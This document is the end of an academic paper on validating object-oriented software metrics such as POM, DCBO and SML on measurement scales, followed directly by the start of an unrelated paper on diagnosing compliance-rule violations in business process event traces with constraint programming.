Since DAC is calculated solely from the classes within a program or project, the partial properties of the metric are described by (1) adding or subtracting an abstract class to the program or project, and by (2) adding or subtracting a class that is not an abstract class to the program or project. As abstract classes are added (subtracted), DAC increases (decreases). As classes that are not abstract classes are added (subtracted), DAC decreases (increases). If we accept the density of abstract classes as a measure of reusability through inheritance then DAC is a valid measure on an ordinal scale.
The measure DAC is a quotient where the dividend is the count of abstract classes and the divisor is the count of all classes. As counts, both the dividend and the divisor are absolute scales, and proportions of absolute scales are ratio scales [12]. Therefore, if we can accept that the count of abstract classes defines a measure of reuse through inheritance, DAC may be assigned to the ratio scale.
The advantage of DAC over NAC is that DAC allows us to compare programs of different sizes, as it measures a proportion rather than an absolute count.
6. **Proportion of Overriding Methods in a Subclass (POM)**
POM is the proportion of methods in a subclass that override methods from a superclass. POM ranges along the closed interval [0,1] and is proposed as an improvement to the Number of Methods Overridden (NMO) metric of Lorenz and Kidd [10]. Lorenz and Kidd argue that subclasses should extend their superclasses, i.e. be specializations of the superclass, rather than override the methods of the superclasses. POM is offered as an inverse measure of specialization. A large POM may indicate a design problem.
Overriding methods in a subclass are those that have the same name as some methods in the superclass. Let |M| be the total number of methods in the subclass, and let |O| be the number of methods in the subclass that override methods in a superclass. Then
\[ POM = \frac{|O|}{|M|}. \]
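A sketch of the POM computation, assuming overriding is detected by matching method names against the superclass (all names below are hypothetical):

```python
def pom(subclass_methods, superclass_methods):
    """POM = |O| / |M|: subclass methods whose names also appear in a
    superclass (i.e. overriding methods), over all subclass methods."""
    overriding = set(subclass_methods) & set(superclass_methods)
    return len(overriding) / len(subclass_methods)

# Hypothetical subclass with four methods, one of which overrides:
print(pom({"draw", "move", "resize", "area"}, {"draw", "initialize"}))  # 0.25
```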
The partial properties of POM are described by adding or subtracting overriding methods to or from the subclass. As overriding methods are added (subtracted), POM increases (decreases). If we accept the proportion of overriding methods as an inverse measure of specialization, then POM is a valid measure on an ordinal scale. The metric POM is a quotient where the dividend is the count of methods in a subclass that override methods from a superclass, and the divisor is the count of all methods in the subclass. As counts, both the dividend and the divisor are absolute scales, and proportions of absolute scales are ratio scales [12]. Thus POM is a valid measure on the ratio scale.
The advantage of POM over NMO is that POM allows us to compare programs of different sizes, as it measures a proportion rather than an absolute count.
7. **Unnecessary Coupling through Global Usage (UCGU)**
UCGU is offered as an improvement to the *Global Usage (GUS)* metric of Lorenz and Kidd [10]. Whereas GUS counts the number of global variables, including system variables that are global to the entire system, class variables that are global to the class, and pool directories which are global to any classes that include them, UCGU counts the number of times global variables are invoked. Assume $C_i$ is the number of class global variables in class $i$, $G_i$ is the number of system global variable invocations in class $i$, and $P_i$ is the number of pool directory invocations in class $i$. Then
$$UCGU = \sum_i G_i + \sum_i C_i + \sum_i P_i.$$
The partial properties that define the measure are the addition or deletion of global variables, in their various guises, to the system. Since the instances of global variable usage are counted, adding or removing system global variables or pool directories without invoking them will not cause UCGU to change (though GUS would change). As class global variables are added (subtracted), UCGU increases (decreases). As system global variable or pool directory usage is added (subtracted), UCGU increases (decreases). If we accept UCGU as a measure of poor design and we also accept that the design deteriorates as global variables are added, then we can accept UCGU as a valid measure on an ordinal scale.
In order to establish UCGU as a ratio scale, we need to show that the measure UCGU is additive under the concatenation patterns of object-oriented classes. As an example, consider the hierarchy chart of Figure 1 as a structure to which we wish to add Figure 6. Clearly, if Figure 6 is inserted into Figure 1, the global variables in the two programs represented by the hierarchy charts are not affected. The instances of global variable usage are not affected by the merger of the two programs. UCGU of the merged program is equal to the addition of UCGU of the initial program and UCGU of the added program. Therefore UCGU can be accepted as a valid measure on the ratio scale.
8. **Degree of Coupling between Classes (DCBO)**
DCBO is offered as an improvement to the *Coupling between Object Classes (CBO)* metric of Chidamber and Kemerer [3]. According to Chidamber and Kemerer, excessive coupling among object classes can hinder reuse through the deterioration of modular design, and the greater the degree of coupling the more sensitivity to changes in other parts of the program. Whereas CBO is a count of other classes with which a specific class shares methods or instance variables, DCBO for a class is the count of methods utilized from other classes. DCBO ranges from 0 to $N$, where $N$ is a positive integer. DCBO represents the outside-the-class methods utilization for the class being measured. If a class is entirely self-contained, the DCBO for that class is zero.
In order to describe the partial properties of DCBO we apply the following atomic modifications:
- a) addition (deletion) of a method to the measured class which calls a method which resides in a different class,
- b) addition (deletion) of a method to another class and the addition (deletion) of a call to the method from the measured class,
- c) movement of a method from the class where it resides to the measured class which uses the method.
Consider Figure 1 and atomic modification a. If a new call to a method which resides in class E is added to class D, it is clear that DCBO of class D increases. The user would generally agree that inter-object complexity increases (decreases) as inter-object coupling is added to (deleted from) an existing hierarchy chart. DCBO would seem to meet that criterion.
If atomic modification b is applied to Figure 1 by adding a new method to class E and calling the new method from class D, it is clear that DCBO of class D increases. The user would generally agree that inter-object complexity increases (decreases) as coupling is added to (deleted from) an existing hierarchy chart. Again, DCBO would seem to meet that criterion.
If a method which resides in class E is moved to class D, i.e., the application of atomic modification c, and it is assumed that both classes need access to the method, it is clear that the DCBO of class E increases while the DCBO of class D decreases. The user would generally agree that while the overall complexity has neither increased nor decreased, the complexity of both D and E has changed.
Thus DCBO appears to be a valid measure on the ordinal scale. In order to establish DCBO as a ratio scale, we need to show that DCBO is additive under the concatenation patterns of object-oriented classes. Since DCBO is a measure of one aspect of a class's complexity, the concatenation pattern of interest is the merger of two classes. The DCBO of the merged class D+E is $DCBO_{D+E} = DCBO_D + DCBO_E - \lambda_{DE} - \lambda_{ED}$, where $\lambda_{DE}$ is the number of methods in D called by E, and $\lambda_{ED}$ is the number of methods in E called by D.
Because we are measuring the interaction between two classes, the merging of these classes changes the fundamental relationship of the methods within each to the methods in the other, i.e., what was interclass communication before the merge becomes intraclass communication after the merge. Total communication has remained the same but the fundamental relationships have changed. Let us define a conservation of communication: The merging of two classes does not change the amount of communication taking place, i.e., the number of methods calling other methods. However, the perspective of the communication in relation to object boundaries changes from interclass communication to intraclass communication whenever the merged classes utilize the methods of each other. The exact opposite effect takes place when a class is split into multiple classes.
Let us further define DCWO as the Degree of Coupling within a Class, i.e., the number of methods utilized within the class. Then, total communication for some predefined system is equal to $DCBO + DCWO = \kappa$, where $\kappa$ is a constant for the system in question. Thus, if two classes are merged (or a class is split into two), $\kappa = DCBO_{old} + DCWO_{old} = DCBO_{new} + DCWO_{new}$. $DCBO/\kappa$ satisfies the requirements of the ratio scale.
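The merge identity for DCBO can be illustrated with sets of caller/callee pairs; the classes and call counts below are hypothetical:

```python
# Sets of (caller, callee) pairs for the outside-the-class methods each
# class uses; all class and method names here are hypothetical.
calls_D = {("D.m1", "E.m1"), ("D.m2", "F.m1")}  # DCBO of D is 2
calls_E = {("E.m2", "D.m1")}                    # DCBO of E is 1

dcbo_D, dcbo_E = len(calls_D), len(calls_E)
lam_DE = sum(1 for _, callee in calls_E if callee.startswith("D."))  # in D, called by E
lam_ED = sum(1 for _, callee in calls_D if callee.startswith("E."))  # in E, called by D

# Merging D and E turns their mutual calls into intraclass communication:
dcbo_merged = dcbo_D + dcbo_E - lam_DE - lam_ED
print(dcbo_merged)  # only the call into class F remains interclass: 1
```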
9. **Number of Private Instance Methods (PrIM)**
PrIM is offered as a measure of information hiding by a class. The PrIM for a class is the count of the methods within the measured class which are declared to be private. These are the methods that cannot be called by other classes. Because the private methods are hidden from other classes, this count is said to represent the amount of information hidden from the calling classes. PrIM ranges from 0 to $N$, where $N$ is a positive integer.
In order to describe the partial properties of PrIM consider the addition (deletion) of a method to the measured class, which is declared as private and therefore cannot be called by another class. The PrIM of the measured class increases (decreases). It seems reasonable that the amount of information a class hides from other classes increases (decreases) as private methods are added to (deleted from) the class. A measure can be used as an ordinal scale if the measurer accepts the partial properties of the atomic modifications defined for that measure and the axioms of the weak order hold. The axioms of the weak order hold and the acceptance of PrIM as an ordinal scale seems clear.
In order to establish PrIM as a ratio scale, we need to show that PrIM is additive under the concatenation patterns of object-oriented classes. Since PrIM is a measure of the information hidden by a class, the required concatenation pattern would be to merge two classes and recalculate PrIM. Private methods are those methods that cannot be called by other classes. Consider Figure 1. The PrIM of the combined class B+C is $PrIM_{B+C} = PrIM_B + PrIM_C - \delta$, where $\delta$ is the number of private methods that B and C hold in common, i.e. $\delta$ is the size of the intersection of the private methods of classes B and C. This is equivalent to taking the cardinality of the union of two sets. Thus PrIM can be used as a ratio scale.
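The union argument can be sketched with sets of hypothetical private method names:

```python
# Merging two classes keeps each distinct private method once, so PrIM
# of the combined class is the cardinality of a set union (all method
# names below are hypothetical).
priv_B = {"validate", "log", "reset"}
priv_C = {"log", "archive"}

delta = len(priv_B & priv_C)        # private methods held in common
prim_merged = len(priv_B | priv_C)  # PrIM of the combined class
assert prim_merged == len(priv_B) + len(priv_C) - delta
print(prim_merged)  # 3 + 2 - 1 = 4
```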
10. **Strings of Message Links (SML)**
SML is proposed as a measure of error-detection complexity. It is offered as an improvement to the Strings of Message-sends (SMS) metric of Lorenz and Kidd [10]. Whereas SMS is defined as the number of linked messages, SML is defined as the count of intermediate results that linked messages generate to feed to each succeeding message. The message linking form of coding makes intelligent error recovery more difficult. SML ranges from 0 to N, where N is a positive integer.
As an example, consider the Smalltalk command “self account balance printToTranscript”, which causes four messages to be strung together with no chance of detecting invalid intermediate results. SML is calculated by counting the potential nil and false conditions that are not accounted for in the code. SML for this example is three.
The expanded code is explained in the following diagram:
```smalltalk
self account balance printToTranscript
```
First, the message `account` is passed to `self`. This message states that the portion of `self` that represents an account is to be used. `anAccount` is returned from this operation, or nil if the account is nonexistent. A nil value results in a run-time error.
```smalltalk
anAccount balance (or nil)
```
Second, the message `balance` is sent to `anAccount` (the result of the previous message). The result of this operation is a `Float`, or the account balance may be nil. A nil value again results in a run-time error.
```smalltalk
aFloat printToTranscript (or nil)
```
Third, the message `printToTranscript` is sent to the object `aFloat` (the result of the previous message). This results in the balance portion of the account being formatted as a string, or false if the balance came back in another format, say as an integer.
```smalltalk
aString (or false)
```
Fourth, `aString` is the string resulting from the `printToTranscript` operation.
The partial property description of this measure is the addition (deletion) of message-sends to (from) the nested message structure. As statements are added to (deleted from) the nested structure, the value of SML increases (decreases), which is in compliance with the measurer’s reasonable expectation. Thus, SML can be assigned to the ordinal scale.
Consider the merging or splitting of nested message-sends. If the above example of a Smalltalk command were split into two message-send statements, SML for each string would be one, and the total SML would be two. In general, merging two nested strings will result in an SML measure equal to the sum of the SMLs of the two nested strings, plus one. Further, in the above example, if we split the original command into four one-message-send statements, the SML for each string becomes zero, and thus the total SML becomes zero. Because SML is a count, possesses a natural zero, and admits no transformations, SML appears to be a valid measure not only on the ratio scale, but on an absolute scale.
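The merge/split arithmetic above can be sketched with a simple model in which the SML of a single nested string is its number of intermediate results. This is a hypothetical Python rendering, assuming SML = chain length − 1 for one string; the names mirror the Smalltalk example:

```python
# Hypothetical rendering of SML arithmetic, assuming the SML of a single
# nested string of message-sends is its number of intermediate results,
# i.e. len(chain) - 1 (names below mirror the Smalltalk example).
def sml(chain):
    return max(len(chain) - 1, 0)

full = ["account", "balance", "printToTranscript", "aString"]
assert sml(full) == 3                      # the example's SML of three

# Splitting into two strings yields SML 1 each, total 2 ...
left, right = full[:2], full[2:]
assert sml(left) + sml(right) == 2
# ... and merging is the sum of the parts plus one, as stated above.
assert sml(full) == sml(left) + sml(right) + 1
# Splitting into four one-message-send statements drives SML to zero.
assert sum(sml([m]) for m in full) == 0
```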
Conclusion
Validity may depend on the use to which the measure is to be applied. If one is looking for “red light” indicators that something may be wrong or that something may require extra attention to assure that nothing does go wrong, then an ordinal scale may be all that is required. These “red light” indicators help find abnormal conditions. Finding outliers seems to be the state-of-the-art at this time. However, to truly understand software and the software development process, we need to get a better grip on software measurement.
At a minimum, measures must be validated before they are placed in use. Not every metric that has been proposed in the literature states the dimension that it proposes to measure. However, validation of a metric requires the identification of this dimension. Thus, the very act of validating the measures will help define the many dimensions of object-oriented software.
References
Explaining the Incorrect Temporal Events During Business Process Monitoring by means of Compliance Rules and Model-based Diagnosis
María Teresa Gómez-López and Rafael M. Gasca
Department of Computer Languages and Systems
University of Seville
Seville, Spain
{maytegomez, gasca}@us.es
Stefanie Rinderle-Ma
University of Vienna
Faculty of Computer Science
stefanie.rinderle-ma@univie.ac.at
Abstract—Sometimes the business process model is not known completely, but a set of compliance rules can be used to describe the ordering and temporal relations between activities, incompatibilities, and existence dependencies in the process. The analysis of these compliance rules and of the temporal events thrown during the execution of an instance can be used to detect and diagnose process behaviour that does not satisfy the expected behaviour. We propose to combine model-based diagnosis and constraint programming for compliance violation analysis. This combination facilitates the diagnosis of discrepancies between the compliance rules and the events that the process generates, and enables us to propose correct event time intervals that satisfy the compliance rules.
Keywords—Business Process Compliance, Compliance Rules, Event Analysis, Constraint Programming, Model-based Diagnosis
I. INTRODUCTION
A business process consists of a set of activities that are performed in coordination within an organizational and technical environment [1]. The basis of Business Process Management Systems (BPMS) is the explicit representation of business processes with their activities and the execution constraints between them. Sometimes the description of the model is not known completely, but some parts of the behaviour of the process can be known and represented by means of compliance rules in a declarative way. These compliance rules describe the ordering and temporal relations between activities as well as incompatibilities and existence dependencies in a business process [2], [3], [4], [5]. In case the process model is not available at all or only partly known, compliance of running process instances has to be monitored during runtime [6]. The monitoring of the process can be carried out by means of the temporal events (henceforth events) that describe the execution of the activities of the process. In particular, if the activities are performed by persons or software not integrated in a BPMS that assures a correct execution order, it is possible that the activities are not executed according to the compliance rules. Previous works focused on the detection of compliance violations by monitoring [6]. Our proposal is centered not only on detection and diagnosis, but also on the proposal of the correct intervals where the events should have been executed. Thereby, our proposal assumes that all the compliance rules are correct and that the set of events analyzed represents all the activities executed in a period of time. A compliance rule violation, i.e., a fault in the process execution, is caused by so-called incorrect events. By using the term incorrect event we do not imply that the event itself, i.e., the associated activity execution, is incorrect, but that the time instant when the event occurred was not in accordance with the imposed compliance rules.
Our proposal uses model-based diagnosis theory, which permits discovering the event responsible for a malfunction by comparing the model that describes the system (expected behaviour) with the observational model (observed behaviour). Classic model-based diagnosis needs to be adapted to diagnose compliance rules for multiple process instances, since the same data can be involved in different instances at the same time. Also, it is necessary to establish the part of the model that can explain the incorrect behaviour, and the associated events in the compliance rule scenario. Examples of compliance rules that can be used in a diagnosis process are:
- \( c_1 \): If activity \( A \) is executed followed by an execution of activity \( B \), activity \( C \) must be executed eventually.
- \( c_2 \): If activity \( B \) is not executed, activity \( C \) must be executed.
- \( c_3 \): If activity \( C \) is executed, activity \( D \) must be executed eventually.
- \( c_4 \): Every activity can only be executed once in each process instance.
Consider the following sequence of events monitored as observational model:
\{\text{Start\_Process, Event}_a, \text{Event}_d, \text{Event}_b, \text{Event}_c\}.
Compliance rule \( c_3 \) (in connection with \( c_4 \)) is violated, since \( \text{Event}_d \) was not executed after \( \text{Event}_c \) but before. Although this compliance violation can only be detected after \( \text{Event}_c \) has occurred, this instant is not the root
cause for the violation, but the instant of Event_d that has occurred before. Our proposal enables the identification of the actual culprit of the malfunction, finding out the minimum modification that the instance must undergo to be in accordance with the compliance rules again.
Moreover, by using model-based diagnosis, it is also possible to determine non-compliances even before the rules are violated or activated. Take the following trace of events:
\{Start\_Process, Event_a, Event_d\}
Although none of the compliance rules has been violated yet\(^1\), we can assure that no continuation of this trace exists that does not lead to a violation of compliance rules c_1 to c_4. Whether Event_b is executed or not, Event_c has to be executed; but Event_c requires a later execution of Event_d (c_3), which is impossible since Event_d has already been executed and cannot be executed again (c_4). The model-based diagnosis process proposed in this paper reports the event responsible for the malfunction and how to resolve it, for the example: execute C before D. This constitutes a novel pro-active detection and follow-up treatment of compliance violations before they actually occur.
Altogether, we have centered our proposal on three contributions:
- Detecting violations of compliance rules during runtime using events for multiple instances, enabling proactive treatment of future violations.
- Determining compliance-violating events. This enables fine-grained feedback and recovery, since not only the violated rules are known, but also the event or events that have provoked the fault.
- Determining the correct time interval where the responsible events for compliance violations should have occurred.
As it is possible that multiple instances of the same business process model can be involved in the same diagnosis process, we will also provide the necessary guidelines to enable the diagnosis of events for multiple instances collected in the same monitoring process.
The paper is organized as follows: Section II presents the compliance rule language based on graphs that we use to represent the temporal order relations between activities. An example has also been included in that section to facilitate understanding. Section II-B analyses the necessity of determining the trace of events when multiple instances participate in the diagnosis. Section III describes how to model the compliance rules by means of numerical constraints. Section IV explains how to model and compute the problem using model-based diagnosis theory to obtain the possible correct time intervals that satisfy the rules. In that section, the Constraint Programming paradigm is introduced, since it allows us to compute the diagnosis automatically depending on the observations. Section V analyses the main papers related to this work. Finally, conclusions and future work are also included in the document.
II. PRELIMINARIES
In this section we provide necessary background information. In particular, we introduce event and data context as necessary means for compliance analysis in a multiple instance setting.
A. Compliance Rule Description
Many languages have been proposed to describe compliance rules. Some of them will be analyzed in Section V. In order to facilitate the correct description of the compliance rules, it is necessary to take into account the complexity of the specification language. It must neither become an obstacle for constraint specification nor for the validation of processes against constraints. Thus, it is important to find an appropriate balance between expressiveness, formal foundation, and efficient analysis. The constraint specification language used in this paper is based on Compliance Rule Graphs (CRGs) [4]. We opted for CRGs since they provide a visual representation, enable the representation of common compliance rule patterns, and are particularly suited for compliance monitoring [6].
Basically, a CRG enables the graphical specification of a compliance rule \( c \) over a set of process activity types \( A \). Specifically, a node of the CRG maps to an activity type \( a \in A \) which could be present in the processes on which \( c \) is imposed. In Figure 1, for example, the CRG reflecting compliance rule \( c_1 \) consists of nodes that map to activity types Payment run, Transfer to bank, and Check bank statement. A CRG always follows the structuring into two node sets reflecting the antecedent and consequence parts of the rule. The antecedent nodes of the CRG represent all activity types that trigger the associated compliance rule. The consequence nodes reflect the necessary consequences a compliance rule is imposing in case the compliance rule is triggered. For both antecedent and consequence nodes, a further distinction is made into occurrence and absence nodes. Occurrence nodes reflect the presence of an activity type in the underlying process. Absence of certain activity types is expressed by absence nodes respectively. In Figure 1, Payment run is an antecedent occurrence node meaning that \( c_1 \) is triggered if an activity of type Payment run is present in a process. Transfer to bank and Check bank statement are consequence occurrence nodes reflecting that in case a Payment run has taken place, both of them have to happen afterwards. As can be seen from this example, some order can be imposed on the nodes of the same type, i.e., antecedent and consequence. For example, regarding \( c_1 \), Transfer to bank and Check bank statement have not only to be executed after Payment run has occurred, but also in this given order. Edges between antecedent and consequence nodes describe
\(^1\) and there is no conflict between compliance rules \( c_1 \) to \( c_4 \)
implication relations. On top of these control-flow-related structures, data extensions for CRGs exist [7].
In order to introduce how the rules can be described by means of CRGs, and explain how the model can be diagnosed, an example about bank transfers presented in [8] is used. Figure 1 depicts the example by means of the CRGs, whose description is:
- \( c_1 \): Conducting a payment run creates a payment list containing multiple items that must be transferred to the bank. Then, the bank statement must be checked for payment of the corresponding items.
- \( c_2 \): For payment runs with amount beyond 10,000 \( € \), the payment list has to be signed before being transferred to the bank and has to be filed afterwards for later audits.
- \( c_3 \): When payment of an open item is confirmed in the bank statement, the item has to be marked as cleared eventually.
- \( c_4 \): Once marked as cleared, the item must not be put on any payment list.
B. Diagnosis of Events for Multiple Instances: Data and Event Contexts
In this paper, we exploit the graphical notation of CRGs and translate them into a Constraint Satisfaction Problem later on.\(^2\) In any case, the abstraction of the process will be the event trace. By an event we refer to the observable execution of an activity in a business process during monitoring. An event is defined by the tuple \( \langle \text{Time}, \text{Event Context} \rangle \), with \( \text{Time} \in \mathbb{R}^+ \). The Event Context becomes relevant for analyzing compliance in the case of multiple instances and will be defined in the following.
Supposing that an event represents the execution of an activity at an instant, it is possible that the same activity would be executed several times in the same instance, or for several instances. For carrying out the diagnosis it is crucial to distinguish between both cases. For example, if two events \( e_1 \) and \( e_2 \) represent two executions of activity \textit{Payment run} for different instances, and another event \( e_3 \) occurs due to execution of activity \textit{Transfer to bank}, it would be necessary to know whether the event \( e_3 \) is related to the event \( e_1 \) or \( e_2 \). This problem is related to the question of which event model is used. If all events are equipped with unique references to the instances they represent, the relation between events is easier to determine. However, the existence of such unique references cannot be assumed for all application domains, particularly if the events stem from heterogeneous sources [8]. Existing event models such as XES [9] typically equip events with time information and attributes. However, the definition of the event context to be used in associating events for later diagnosis has not explicitly been addressed. In these cases, the association between events has to be determined based on different information that enables establishing an association. A similar concept has been provided by correlation in BPEL [10]. Adopting the idea of correlating events to instances via data, we will exploit context, i.e., \textbf{Data Context} or \textbf{Event Context}, that is shared between the events reflecting the underlying activity executions. In the following, we present the context model depicted in Figure 2: a compliance rule refers to a set of activities. As these activities are connected to process data, the compliance rule can be associated with a data context, which is reflected by the events occurring in the run of the activity executions.
The latter is captured within the event context, reflecting all data contexts an event might refer to.

The data context of a compliance rule \( c \) is described by a set of pairs \( \langle \text{Name}, \text{type} \rangle \). In Figure 1, the data context associated to compliance rules \( c_1 \) or \( c_2 \) is \{\text{Payment list: string}\}, and for \( c_3 \) or \( c_4 \) the data context associated to each of them is \{\text{Payment list: string, Item: integer}\}. Although each compliance rule is only defined for one data context, and an activity can participate in more than one compliance rule, it is not possible that an activity is involved in two compliance rules defined for different data contexts. In Figure 3 the relation between data contexts (Payment and \{\text{Payment List, Item}\}), compliance rules and activities for the example is shown.
The event context of an event \( e \) is defined as the set of specific values of each event \( e \) for the data context of the activity that the event represents. Then, each event context is described by the triple \( \langle \text{activity, instantiation of the data context, list of information associated with the event} \rangle \), that represents the activity that was executed, the specific instantiation for the data context associated to the activity of the type specified in the data context, and optionally a data value if it is necessary for the compliance rules (as in the compliance rule \( c_2 \) of Figure 1).
An example of reception of events, where the time is represented by means of a number of seconds after a time reference, is:
- \( e_1 = (1584, \{\text{Payment run, } \{\text{Payment list: A}\}, \text{amount} = 60,000\}) \)
- \( e_2 = (2145, \{\text{Transfer to bank, } \{\text{Payment list: A}\}\}) \)
- \( e_3 = (2589, \{\text{Check bank statement, } \{\text{Payment list: A}\}\}) \)
- \( e_4 = (3256, \{\text{File payment list, } \{\text{Payment list: A}\}\}) \)
- \( e_5 = (3267, \{\text{Payment confirmed, } \{\text{Payment list: A, item: 1}\}\}) \)
\(^2\)The formal semantics of CRGs is based on First Order Logic. The abstraction of the processes is provided by using event traces.
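The event tuples above can be represented directly in code. This is an illustrative Python sketch of the tuple \( \langle \text{Time}, \text{Event Context} \rangle \), with the event context as the triple described earlier (activity, data-context instantiation, optional data values); the class and field names are not from the paper:

```python
# Illustrative sketch (names are not from the paper) of the event tuple
# <Time, Event Context>, with the event context as the triple described
# above: activity, data-context instantiation, optional data values.
from dataclasses import dataclass, field

@dataclass
class Event:
    time: int                 # seconds after a time reference
    activity: str
    data_context: dict        # e.g. {"Payment list": "A"}
    data: dict = field(default_factory=dict)

trace = [
    Event(1584, "Payment run", {"Payment list": "A"}, {"amount": 60000}),
    Event(2145, "Transfer to bank", {"Payment list": "A"}),
    Event(2589, "Check bank statement", {"Payment list": "A"}),
    Event(3256, "File payment list", {"Payment list": "A"}),
]

# An observational model is the trace ordered by instant of occurrence.
assert trace == sorted(trace, key=lambda e: e.time)
```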
For example, if an event \( e_j \) has an event context \( \langle \text{Payment confirmed, \{Payment list: A, Item: 2\}} \rangle \), it expresses that the activity \( \text{Payment confirmed} \) has been executed with the specific data context \( \langle A, 2 \rangle \).
Finally, compliance rules as well as process activities can be clustered with respect to their data context (see Definition 1), i.e., the data they share and operate on. Based on such clusters it becomes possible to monitor and diagnose the compliance of multiple instances during runtime. Another approach to cluster compliance rules was proposed in [11], but there the clustering was done based on the processes a rule refers to, not the data context.
**Definition 1** (Activity and Compliance Rule Cluster (dc: Data Context)). Let \( C \) be a set of compliance rules and \( A \) a set of activities. Then we define compliance rule cluster \( C_{dc} \) and activity cluster \( A_{dc} \) based on data context \( dc \) as follows:
\[
C_{dc} := \{ c \in C \mid DataCtxt(c) = dc \}
\]
\[
A_{dc} := \{ a \in A \mid \exists\, c \in C \text{ defined over } a \land DataCtxt(c) = dc \}
\]
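Definition 1 can be sketched as a grouping operation over the running example's rules. This is a hypothetical Python rendering; the activity map is abbreviated to two rules for illustration:

```python
# Sketch of Definition 1 over the running example: cluster compliance
# rules and activities by shared data context (the activity map is
# abbreviated; only two rules' activities are listed for illustration).
from collections import defaultdict

rule_ctx = {                          # DataCtxt(c) for each rule
    "c1": ("Payment list",),
    "c2": ("Payment list",),
    "c3": ("Payment list", "Item"),
    "c4": ("Payment list", "Item"),
}
rule_activities = {
    "c1": {"Payment run", "Transfer to bank", "Check bank statement"},
    "c3": {"Payment confirmed", "Mark as cleared"},
}

C_dc = defaultdict(set)   # C_dc := {c in C | DataCtxt(c) = dc}
A_dc = defaultdict(set)   # A_dc := activities of rules with context dc
for rule, dc in rule_ctx.items():
    C_dc[dc].add(rule)
    A_dc[dc] |= rule_activities.get(rule, set())

assert C_dc[("Payment list",)] == {"c1", "c2"}
assert "Mark as cleared" in A_dc[("Payment list", "Item")]
```

The two dictionaries correspond directly to the compliance rule cluster \( C_{dc} \) and the activity cluster \( A_{dc} \) of Definition 1.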
It is not possible that two events of an activity during a monitoring cycle have the same identifier for the event context. For example, it is not possible that two events of the activity \( \text{Payment run} \) have the identifier of context \( \{\text{Payment list: A}\} \) in the same cycle of monitoring, since it is necessary to establish the trace of the events during the execution.
**III. DESCRIBING COMPLIANCE RULES BY MEANS OF NUMERICAL CONSTRAINTS**
In order to carry out the model-based diagnosis, the compliance rules and the monitored events need to be included in the model to solve. As we aim at finding out the possible correct time intervals for a malfunction, it is necessary to use a model that permits the inclusion of numerical aspects, such as numerical constraints that describe the time instants of the event executions, not only the temporal order relation between them.
**A. Modeling events by means of Numerical Constraints**
As introduced in the previous section, an event is described by means of an instant and an event context. This implies that an observational model is described by a sequence of events, ordered by the instant when they were thrown, \( \sigma = \langle e_1, \ldots, e_n \rangle \) [12], where this trace can involve different instances of the same process model. In this paper we assume that events are only represented by means of an occurrence at an instant, not with a duration.

To diagnose a compliance rule violation in a business process, it is necessary to model the executed events and the events that can be executed in the future as well, in order to determine possible non-compliances according to the compliance rules. Obviously, it is not possible to know the events that will be executed in the future, but we have some information derived from the compliance rules that describe the model. For example, analysing compliance rule \( c_4 \) of the example, if an event related to the activity Mark as cleared is executed, it is possible that an event for the activity Put on payment list will be executed in the future, although this is described as an incorrect behaviour of the process. In order to model the scenario to diagnose, the executed events and the non-executed events must both be included, since they can be related by means of the different compliance rules that govern the process behaviour. For example, if activity \( B \) must be executed after activity \( A \), and an event of \( A \) was executed at the instant \( t_z \), then to satisfy the compliance rule an event of \( B \) has to be executed after the instant \( t_z \) and before the instance ends. As the events included in the model can represent events thrown in the past, or events that can be executed in the future, we propose to include in the model-based diagnosis, for each event (executed or not), a pair of variables \((\text{Executed}, \text{Time})\): the Boolean variable Executed represents whether the event has been executed, and the numerical variable Time the instant when it was executed. Depending on the instant when an event is executed, both parameters \((\text{Executed} \text{ and Time})\) can take different values, and must satisfy the following rules depending on the execution of each event:
- If the event \( e \) has been executed: \( \text{Executed} = true \land \text{InitialTime} \leq \text{Time} \leq \text{CurrentTime} \) (\( \text{event}_i \) in Figure 4)
- If the event \( e \) has not been executed but will be executed in the future: \( \text{Executed} = true \land \text{Time} > \text{CurrentTime} \) (\( \text{event}_j \) in Figure 4)
- If the event \( e \) has not been executed and will not be executed in the future: \( \text{Executed} = false \land \text{Time} = -1 \)
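The three cases can be captured as a consistency check on the pair (Executed, Time). This is an illustrative Python sketch; in it the third case takes Executed = false, as its description ("will not be executed") implies:

```python
# Illustrative consistency check on the (Executed, Time) pair of one
# event; the three branches mirror the three cases listed above (the
# third case takes Executed = false, as its description implies).
def consistent(executed, time, current_time, initial_time=0):
    past   = executed and initial_time <= time <= current_time
    future = executed and time > current_time
    never  = (not executed) and time == -1
    return past or future or never

now = 3300
assert consistent(True, 2145, now)    # executed at instant 2145
assert consistent(True, 4000, now)    # will be executed in the future
assert consistent(False, -1, now)     # will never be executed
assert not consistent(True, -1, now)  # inconsistent assignment
```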

B. **Modeling Compliance Rule Graphs by means of Numerical Constraints**
In order to infer whether an activity has been executed at an incorrect instant, according to a set of events, we propose to transform each CRG into a numerical constraint to be combined with the model of event execution explained in the previous subsection. The inclusion of numerical aspects in the compliance rule validation process enables proactive treatment of future violations. Each edge involved in the CRG is transformed into a numerical constraint to represent the time and temporal order of execution of the activities. Following the possible patterns of relation that can exist for the components of a CRG, Figure 5 shows the transformation of each combination of nodes into a logical formula that will be included in the numerical model to diagnose the business process execution. In Figure 5, the execution of an activity \( A \) and the instant when it is executed are represented by means of the variables \( A_{Ex} \) and \( A_T \) respectively. The patterns put the constraints of the antecedents before the implication operator ‘\( \rightarrow \)’, and the constraints of the consequences after it. The temporal order is represented by relating the variables \( A_T \) with the ‘\( < \)’ operator, and the occurrences and absences by means of the Boolean variables \( A_{Ex} \) for the different activities.
For the example of Section II, the constraints that describe the compliance rules according to the CRGs are:
- \( c_1: \) \( \text{PaymentRun}_{Ex} \rightarrow (\text{TransferToBank}_{Ex} \land \text{PaymentRun}_{T} < \text{TransferToBank}_{T}) \land (\text{CheckBankstatement}_{Ex} \land \text{TransferToBank}_{T} < \text{CheckBankstatement}_{T}) \)
- \( c_2: \) \( (\text{PaymentRun}_{Ex} \land \text{amount} > 10,000 \land \text{TransferToBank}_{Ex} \land \text{PaymentRun}_{T} < \text{TransferToBank}_{T}) \rightarrow (\text{SignPaymentList}_{Ex} \land \text{SignPaymentList}_{T} < \text{TransferToBank}_{T}) \land (\text{FilePaymentList}_{Ex} \land \text{TransferToBank}_{T} < \text{FilePaymentList}_{T}) \)
- \( c_3: \) \( \text{PaymentConfirmed}_{Ex} \rightarrow \text{MarkAsCleared}_{Ex} \land \text{PaymentConfirmed}_{T} < \text{MarkAsCleared}_{T} \)
- \( c_4: \) \( \text{MarkAsCleared}_{Ex} \rightarrow \neg (\text{PutOnPaymentList}_{Ex} \land \text{PutOnPaymentList}_{T} > \text{MarkAsCleared}_{T}) \)
